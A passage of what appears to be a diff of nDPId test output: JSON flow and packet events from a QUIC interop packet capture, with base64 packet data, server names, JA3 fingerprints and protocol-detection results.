vuRho9kE\/w49GkWM1RjqkESV8QnS5lO0lusZRdgG0jcilTPBNKWvJtuU+BOtxOeZOoU0KAQk0iRVOjpxTJNLkEFDMqLOTl4GP6l1DPyRiUIbC9dxVJliklcqIHHcx9Son3\/0eV4Dlc9XMJzUFYLYDpip1il7dd3MOMzw=="} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02156{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApCJAAEARDmPAqAGAjOM0XK5LEVEE7HYoyAoKCgoIlk3\/sw8\/b8wAAETStyAajltT68+ELYCklsRAAPKAhQKMXFJKXjIBWFRGvhiDbyM2RmA52mTO4kP\/LrjWRFOsZXPJwPYxhAgmyxVp2EaKhvInx5Lw6HoctLCI997uZ1ErbFrvVx2kMNsPbvf0c3KMKg04dEw3CGmIj1nwwAV3TplnDlLA8nGhigvTtzDcOYuThyFe7PNCKGoMhnIJglojVVIsBdMJYdSb90I\/+fQVaZ\/MIgmBIoSGWUE5ZAGntmDgtp0dgmx\/\/p7O+2ApCOoZi2+ZG1i32q4n752EIFh9R1W9\/09HXsuHjyhRiyoUZgqfvLkrSOvdv2ZApV3VMcrOD182D\/IFqwmSJhEKqa3Gz0XQ7x1AhDvKB\/98pdfLJuGPyAwXeMf3RbsjoJ7UbwIjIEtg2aJPV4zFaASkuBedOA0xRnIgegCv4bmWgElYnQC3X2r85hddZMtDhxN4hidUWYN\/uvDzyKGj38LAsQE2LOY\/U4yjUes\/A4X3Db4RMeoGGuaTPx8vHEhWcAZIkak3bdmdfUCKhTRw1Sobn\/0WZO3JeU\/O3LN6aaFNpd44oi+fv1YoqhJLtxNGYHj6lTz\/xWvwh\/5OpWupvnaRJw140wePCUI03nAaDAbvdgZhJxJUM9Ez2imcu\/DPUQxAcI87gwO9rHzyEFTZvBE2fYXUdWQ\/lBLvDIIIlbqrIBwZN4Rm1K7rJEsqaSGAetVKqYqrotg3G0Xv61dakHj\/9j5SGgi\/fc4wYQ4pRjWW7gItXzVqCglacLb3JoibdGgtA9WYGsZizewIUhH3c6imISZ6jCjLrzmXYytkHa2NT60DFmqp\/vbUzMpbFIHZoMMMlZrZErLgQqwcQrIy3BrvnbjZx8ZBklzbGPAwWqCy+HTuUfRLftp\/kFiVk1D\/72KMbyr6s7Bkxhgo4bI7zvMOHUidZ2hdC7UGsUUF\/x5smJeYW4wNdHD5iv58qpr6HaH2Rdza4ULK\/pyl75oX9CDKuX6jrGDlbgHOykS1bvJCTRfYwBjtGXraF58jEQVZJJ6HImPxPLTVvhi1weX0G57pwdQK\/6eBVH95xHZHTJaU4Kw3RS3xIWdjP6LitM0DZwW6TtS3P2G33o2Wkp7Fc9Y1dXTKUMs0nCmH9d7CCnjVWLYi1dhtz+Tta6lf48tU\/Qqf+zHItaHY7LtapxEIIsNEmVNQuXDZMbBZtU9UWcCYPTIXOZsOuWi+KlnlEVjhzxN\/kL7Rx56YZNVto9cOmH\/bByewHjhP8N44u7cip7U0HR+jmMmuxSSFw8RHPveSA9s0JovEVcJmQ19M5ynV7yxMWdfjeOMYtsTVM0tONAfzs92B1HE+34bwQSIOaG8X7No01hV+V\/yj+dryeODPmr1LKIAJ\/MbgypzFmTw29gDvyUBXq+ZwqdS3iCKSfowPes0BSJPSzSUi4Z4dIaBSLQpt9PNBOgH0m+JbP5PlkMRT2nmJjGR3PzvdWiWmCFTAb5JDoyjuyFHdi3lWKONx+lFmz
ZJwxs+UMErRJBVTz8V6tf9wiTJCTFmYGF4UgB\/CTJx3DI6wbo9X53d0S0QTy3dGXJZO\/H8qOsGI8aNw1qzLXLU6KpohKtMy7TWM8yk8onvWWarA524pLpTHLJknBb\/q73gznwGfXGsA9dvY+vw8XuLELA=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1603816434674,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434674,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAc6RAAEARGHTAqAGAKHC\/PLXwEVEE7EM\/ywoKCgoIUh1YuhDqcyAAAETSyJu8rPDcY2Zmg9uhZvVGBSUtVHXbCogcrtjHkIZvyHG+oeQ7FMn5l9+yu4riTWt9G4+IRLvodWF\/OJuoo6CqqAN5qJoCM2wclVmCRhZ0yQpnR39UyeNNZNj55s0biH2qmAqdK7slUkz7cGbucaEPgYcjaZ1qoQwZ3r+tJVP2\/OosjKKgI3ssy6b8rBby+2gKA6tqrWlo4j913jt0V5Myxk6\/qG4m7XLGNhI+nqBnhUE9EJwSRwQbLcrG1YPxrCPYFKhaONrMEZrfUQUokRl+FtZYxnK7kRHiDzvfmlVCIPnCHsK+5SDQIbVAkCmMUWxjZ3bcH0rMAJZjsUd13Mp827NwaPY1eDE4xURESo0uH3LaTB+cGxcmZiI1vjnmW5fkVYKNgRSg0LQtDAGzCxaf9M30heOBY4ij6gT6HUWwVg+\/JFFdRax7wIj+qnGHaTs+tirGGEnbomoy1juUgYZn3ol7W9gFpvOFFGfsT9glqttgJXgMLwaC66I5aigEznfj7F8whFTNHLDojz+A60t6JiMTNVJkEgkdgm3rvpiMCW15t6bApORRa5kVOHruRwVYI10UY7IsHOtU6782GbDZSpGr8ntN8sySw6dOku3uT76aTNaaNtW\/2\/SmZ6WiPXDUGFDezYRwnESar9Jps0+5gYGAogq9ycMTf2y0dC4uoffSPWz1EdfmGrYbBIJCM9xuPdTrwpA6ThIjDDFV\/a6MJaOn5xQl6aMEUqPMHj458lJHEgyVojPxewoZCn1jkXsVl3BshvNc40UloZP\/zq2QIIDXt8Fodu3I71j4TQet+ImZTuvbDliPLbMm\/UuGwX7wyxtGWarNp2rii5+q0UaxBVtO8\/oJYF0+p44Z\/6vIrPBqNKbPEzkHUHiQQ9awnKGtngmRd0EnWA1J1Y87Abt4Qy51cs2KvlQ8aNSkmdJNosK8Lplp4c9AiloRm+Wlx6dF2sPcBXzpXCJ1Zlb\/eS7cm+1Of3sizAGLukg4XoSb8ue\/DVtfTnqnMgdaKnjOTE4lwUDNk1dzsHxmIBEdGAbUpr+sz2h7ZiHbtdfQRMC8R65ogyaeDK4C1lsoJ7uCJnAWZYyCp2BgnCpvONxxWtaYB6uz0UzVRleBEeiLenAlMfVHpx4w4aBWlyfvuTuObpJLNHDWzAbZSgjHkN3ZYnwTzsuPAriOrYPf6ATtgw+ny2XHg\/qI3joZ2eO+lgJd87BsLnTQUd07WAQILuYO6jQ9vvkRRzosU72uqVr9x1lpfayG4CEyt0LUHBSmhuPmLena56\/to8FPfnyS9lNyeUIAaI4
Fe4R3\/cEHg8NHDOKfjqOhNoajIZ8hm564A0lQ7hQTdBfGSgEwYSiDVP6eZcG+q0lw0017Nrj5WZoVrDtJB2VmZc8vjaptwWTVWvSIds8zNI205cr+tldoXLWshLEkoE0W0QepIpcvJTYL76KEZPhOvEWN08HQuMtxYugoC0qCkSsgCEXMCRpKiTlmRwjkQSmHvPZvjNte3BsWsO0fzr7S19GB7OyjGnnDBaF02DOLob0KkURE8IUAwhzi50lzUy41R1QjTFR94lQA9n5SPLtvlqTYWDXlIlyHzlvKnztl7SJtU\/J2mGtnwVygn3oE2zBGLJfYgi3ZH3hoCHuyTU70yw=="} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1603816434677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434677,"pkt":"PKn0qB\/spJGxgjQ5ht1gBwV2ACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9EVLMLwArOxiAAAAAAAAIjowvkCXlc11FR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="} 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1603816434677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434677,"pkt":"pJGxgjQ5PKn0qB\/sht1gDEm8BNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABrNMRUgTYSrXMCgoKCgj2S26kHUj2aQAARL4Oqb7kxp8VwqfBhPdfdtQhtwUXSB8\/M16zqaKTaiM4uFSCgiApTua+W3aFO11E8\/vpjw5fdiBSABUTDotMg5RkiQr0MSpUaARnrP0PNMBaoZi0T3torsgUpfH8Z7GKLvwTGd3hbCPXQz5HEzUHjJnObkXYOU8pDBMRAGZYnp5rkZbRT2vPBVCj8Cvx8bBBKneUgl1FG4uQ4EwyOma55O1RYgmn2Ynf1Ko5xhvyQTnOGQ+R1VyW0n7heo02IMCfY4VWPj\/QJHyKTPMBIDBtSvz3J6mf3nv69QC6K+3y7kTFVD4RNSmXPDKfJ4r8a\/jVYQ3tiwvsysKnCLgA5zby1+dfPHEiaiwawfH+cKDMssE48zXk1+MDRnahgP5\/5W7h5R0W7WQX3skNYTREacQ3LvDACn58ERfFzl2AshIb29QMiGQj+aXYqT7ftIu1mYCEtR10HqM0E0tdjMJlVoxU1sQCMNHCcSjur932nDLMq95bmJ\/epzRqKtYXqFfJm4ZnhGTZV2QZB+hX7pNkAbrVOicdWh6ASPsIKRVzbgM4azW3TFLOWbFSWksd82BdcgW3kBeZ+Zy87igudzpPx0kdISA+wUJUrSUaJmejNXcUK68sicz01uq+5FBxl7uzJB5i2OXGU+jvmL+lkKweCPtvayVLhcuvz7KLW1nrXu3HU\/E\/bgsaTJyGVokl31OFOSR9LQtdKuoewFPyn5r490C8zNMeXqpImt2kn4Tr\/jlH\/fxzyim4MX4msP404e3jLfo+J9lzJhkenDu9xAnUgd\/iKSb6RgtGPU4Y6NI2QNpIfd6MzugcP8a0lodftPQcResoW35Hgg5t6I+PqN5frd2jtB5RiFyFN6yYVSH5fwqpb5sgLyM2ZMvumoV6ZVCMO3EMaRJu6f+U3CDduLYbXqPjXTUFXnzx9Vt03+YreNFX6wa5PrrBlSKMZP\/2WAmhb8cWINvyoZmFlnI2qd6sXg1dpFNY99Vqu1GrXPgV8Qi9MxV9uHzluuqG5swDMVT91S3LeU6XPmicYuwxrVZ0fDoeWpn4Kta0sEVDVUOf9hI8REFrn\/lLtMViNZ5rtWhIMKLyMIne37ob1RynB8J3PHqTTUqyQWLUmsA7XpXuycyFg0eDsVEBgiX65miUosWBtlhptbWoDODs0zqjlEGqOg5rKyio59+SI+p7jTV93mdfy9Wt2QGrnsPSiOSsj\/pqM\/pZ2PPrcgdTK9VPceK3CdsRz\/jNTpieviefPJXgnQD9JDKvgbRzI7jy8hldn4q+BSAvi3W0FwGFIYHJsgwTS2D+M4jyoohPca8fHwPwrKPUAytl3yLskOFTcOEOwWAP0YkHc8DSZIYnWDfZRitncpUl9qEcnjpTihvHHfw2HQxFR5lkMlUwBOL06kpNLUObIMz0gJ8az8O5U2MJseOwsScI7UtAgMA1Wat1Jr7S5b3fSl1DVUzvG0hnyrSZS2C54u89rSG8QQybBKCe
SDnq1GpKeq\/O7HdjP04WmFuLDA\/vf\/9lSaOXhNpEErLndSFsHzNaPYP8EGwGI4iaWZOfcrm8FyutSUmLAlYtemRojNwXfa2nJlp8muaoRnKD2oN1ySI11a6rSv0gyOvlVRJ5egXWtg=="} -01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00649{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1603816434678,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434678,"pkt":"pJGxgjQ5PKn0qB\/sht1gAjrXBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPlfoRUQTYrGTHCgoKCghDKzGtBgOvzAAARL61MEV7YMQkWdmZghiuiQz1o5QNdpzYuutf\/wdJhEZL1cudV76JEdjtP0Y3OyHIvIbsmMmNX4mYnmIsf1njial3e905frw0uHyw4\/f+5H0ef2WAdacdKOP40DoDeuCFxQz4bIKDgm8hBJ7vkD1IMm7AaEpvUQhSLgN8f+x+sA9RH+TmObL9fghOs+eNxWf96HoP4pMWR3XqHFfSqIk5FX3TNVvr+riiEz6IuctzVwm\/zqWSmC9dmXci8Fui7Q8OxkH6gLCU+aYM9wrrVZJ9j5ya5VCMnDAttNuuPdq5z4cDdXloIyyGypYPGlULxwG65oqg8RxhEo29up9ffJVpEaQX8UGyxOt3ZFGPweILYH6rNyUpje\/uB9d\/2Tqi9fZfaLpagN9mrVHJYMlLvkjpSaeasCrG6FDs+Nh7j2i5xAxuAkQ0xK7QS1Hlggg20h5t9cMg6O780ayQOD4SQCU+0AR1BtVV6iTy8Q0dm9tIpKWeNO7CSURoIrvTXKHBx5OXHuDteNJNabHxEW6\/e\/OGRw8IMWO65lgJPUK\/p\/99LM38gOa9gV2dzOdfDcRMvpSWbp3E44GpcUzlsSO+wF7JBY6P9esQ3iafS\/xZ5rdGYm06lyYTCDffm6X4KxkS
uGJfTJKvPfMGPtO7M1PMG\/4y9kmbFwotO70O3qzn76AeIsqparz4gqE2VEl8QpfdxQliRyqZUZsoWB5UziEcGYDOQAbZw0c82QzSgLib58kPXBug4vmPNM71D9PmG+ZxduAFDFdu7EkUfNSxMfR6hOQumdYRVQ+J+QuJvYZ4r8AlRlJcX6HQpLdQXTOStQMDY7ErsX3+lkhbFCkOUvVD1zPSZ3X9i\/Jl3XL5dbrTO0oYnJiNAJHokvd9x91UJlo5E9+m85+BWm+iMzm3+6bNRAaSQKQrjdjennHLWo7GXNi4AtuurC53Pep+V5GsYHEa33KdpNHgca7X0HexhNHc2ElVJlmKiO9osCGww9ceX9y1pVU1v4UF5cspUvQ5RkcxirKgmOqDN1dbnXmgpQwLWcEgtJk0m+iyn9xNTJhEsJCf4M2GThouE0XLF3rBbGR8AaMV8IgL1g4CrqnSeTXeC0TiPef5r0N5Ew0ni6DodVZqUqNOv+QdCVcZaIWofYvBzMdvqE6zhO4AzOTz4GAPej5UV34aUDRCl13vR0NWFf5GvaZquOIg2EYE\/YyJl2nILl86w\/YT7aCfJJltdrHwSxGGAm2JodfqLx42fCKG98UlucLIjp39SZj8UGSr\/xymfE+UQrmVP\/eIDKUfQ\/F9RzSEtE4Gywjiw+VYseozSQwwkW8vYlep8AwdQshSEv4BOVgTV1jTbJ7jHDu3x3W7Ka2SYTSb3Yt+KkdDWxpTmyTJioeUboa1C8BSpZMyhJwlf1bmECMTVdLKtJOVuXslMtlUCVIAqqT9OTre4ouFYJNjliLNU9F808vVjFTZqlwwQjwIeKMK9tlRJNZxnWX+u5Tmaz0QgLbCP6pKnk6GGff9hBXEoVtopyfSJnogk4UBU3qLzTqqNWTse2gikbJRX2feLSYh9ICdhs0jcaXO512YMcM3tN6524plEU+japLcwChj4baYrOQTz7NVY1HU6hrUlA=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1603816434679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434679,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUArn9AAEARHfrAqAGAyu7cXJXeEVEE7GpTygoKCgoIN5KvB9nft6kAAETSd859O5gTcUYdl0d8aIlRj3zx4AjuKGa4ASMymO7vXZjT6sVM6pCw7HvmCO7cFlITvmBGM4kZgYz2DWfjjS2UhT8z6S+u4ZuqQnP6sPmHL0WtgrbFimoDsZXEWh5x4WsY15wAJFswtYDmxQkwEBAjgyKuyRv6VywYakyk9BNgIHVKy7BfjK1rPoWZ5w5I2hl2yWFdZ1\/dE9wNP5q3XxjhqAOQa4bzoBKefCRP60vRescDr5A1q9Gh9rEI1UxmIZexsLIorUS6jw27c7X3IRHEFYnp7damMbgudCUNTZ0D5\/x2EYQKzoV23CePPHf7CWo9eYf6XRWEJIBGs5xS8ziNV5+H6hYANEPNNnvMqWmg1CtTp6rU+5R3i7\/FA2u3qMYhl9YXtwck1Tx2THWWJnPTlV31JToDh9hcEx6ePHf\/HDVkBKTcysw+7WUh4g1S4U\/E6GwOzJUSl1j4FyQSA72MFR1nukBmK5l3E7lnPPMHE0UwlBbgRRjJIWWWMjukOyYVX7HOM8mWhaZJs8eEj1aINh\/eg4bAf1JY\/ufLTloR31S7y6OReDYCA\/J8a\/ZHMCpyo\/cgCYZnXroSqO5eUMiOd6mWZMV3WlojmNGGqUwidDXDOOAZnauH05acuiWNjN1drZ9uLl7kCD3klbBaB69xmhwOXqhlY+ov6Mo3v8dkwR3EXQE3Cj\/lQ4KJ2OrXiOlAmz\/GweVF9wuMVbg+hyvL7DdfTfw2qYLKgSNqwlGvO5T2f1lglyHLXCucOL7n\/zNjX0\/xlVOCxhUkQhgX\/XGJbbA7qxh9UXxvdZ3egx7Bshhqr1n6BUMoFOpjvUuGdgO0OjUEdRk5Gyk2HkFljHDaGm4ht4bH9hDtZ6HYm7nqyUay+Gd+WMBexYGDLQ2kaYG8GnHD4PrlcFbEvk3ju9rGX1R2QtLYbACEJdNJ\/zEc2GzZDjRz1o1gvI2iG\/x96iCGyzUz1N\/+nAKV+q5s2K22NkRxb1jIgd\/41FenkfbgFmpz0CA\/DQCyiLHlX2lw10drz3XG0f8LJfTp2vzPq\/+gH2c2gRSj2YcaBCyDTY5AKtyDkOEZKSL3C2C8JmYr4iJS8RMpB0jL35JgLPvSFgcoNymNWAjCjfeRN9n7RfdzVEX72bqAPdPKtdKHRkZOWGqcrp9n5GGjnQWG\/Jwx6RR+qXT6KecYDU2tCsKg\/XBFBnLfBCe2RP1K2zPx